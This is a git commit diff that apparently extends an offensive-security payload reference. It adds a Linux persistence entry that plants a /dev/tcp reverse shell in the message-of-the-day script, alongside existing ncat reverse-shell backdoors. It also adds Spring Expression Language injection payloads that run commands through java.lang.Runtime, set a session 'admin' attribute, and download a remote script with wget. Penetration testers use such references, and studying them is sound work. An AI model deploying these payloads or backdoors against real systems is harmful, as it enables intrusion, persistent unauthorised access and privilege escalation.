MOTD + SpEL injection

This commit is contained in:
Swissky 2023-02-20 17:21:43 +01:00
parent d3ccbb5370
commit a38701a7e2
2 changed files with 44 additions and 8 deletions

View File

@ -5,10 +5,11 @@
* [Basic reverse shell](#basic-reverse-shell) * [Basic reverse shell](#basic-reverse-shell)
* [Add a root user](#add-a-root-user) * [Add a root user](#add-a-root-user)
* [Suid Binary](#suid-binary) * [Suid Binary](#suid-binary)
* [Crontab - Reverse shell](#crontab-reverse-shell) * [Crontab - Reverse shell](#crontab---reverse-shell)
* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc) * [Backdooring a user's bash_rc](#backdooring-a-users-bash_rc)
* [Backdooring a startup service](#backdoor-a-startup-service) * [Backdooring a startup service](#backdooring-a-startup-service)
* [Backdooring a user startup file](#backdooring-an-user-startup-file) * [Backdooring a user startup file](#backdooring-a-user-startup-file)
* [Backdooring Message of the Day](#backdooring-message-of-the-day)
* [Backdooring a driver](#backdooring-a-driver) * [Backdooring a driver](#backdooring-a-driver)
* [Backdooring the APT](#backdooring-the-apt) * [Backdooring the APT](#backdooring-the-apt)
* [Backdooring the SSH](#backdooring-the-ssh) * [Backdooring the SSH](#backdooring-the-ssh)
@ -90,11 +91,21 @@ echo $sudopass >> /tmp/pass.txt
## Backdooring a startup service ## Backdooring a startup service
* Edit `/etc/network/if-up.d/upstart` file
```bash ```bash
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null" RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
``` ```
## Backdooring Message of the Day
* Edit `/etc/update-motd.d/00-header` file
```bash
echo 'bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"' >> /etc/update-motd.d/00-header
```
## Backdooring a user startup file ## Backdooring a user startup file
Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop` Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop`

View File

@ -145,8 +145,23 @@ ${{<%[%'"}}%\.
### Expression Language EL - Basic injection ### Expression Language EL - Basic injection
```java ```java
${<property>}
${1+1} ${1+1}
#{<expression string>}
#{1+1} #{1+1}
T(<javaclass>)
```
### Expression Language EL - Properties
* Interesting properties to access `String`, `java.lang.Runtime`
```ps1
${2.class}
${2.class.forName("java.lang.String")}
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
``` ```
### Expression Language EL - One-Liner injections not including code execution ### Expression Language EL - One-Liner injections not including code execution
@ -157,6 +172,9 @@ ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClas
// JVM System Property Lookup (ex: java.class.path) // JVM System Property Lookup (ex: java.class.path)
${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")} ${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")}
// Modify session attributes
${pageContext.request.getSession().setAttribute("admin",true)}
``` ```
### Expression Language EL - Code Execution ### Expression Language EL - Code Execution
@ -181,10 +199,14 @@ ${request.getAttribute("a")}
// Method using Reflection & Invoke // Method using Reflection & Invoke
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")} ${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('whoami')}
// Method using ScriptEngineManager one-liner // Method using ScriptEngineManager one-liner
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))} ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}
// Method using JavaClass
T(java.lang.Runtime).getRuntime().exec('whoami').x
// Method using ScriptEngineManager // Method using ScriptEngineManager
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))} ${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
``` ```
@ -1132,3 +1154,6 @@ layout template:
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) * [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf) * [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)
* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw) * [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw)
* [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Dec 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
* [Leveraging the Spring Expression Language (SpEL) injection vulnerability ( a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
* [Expression Language Injection - OWASP](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)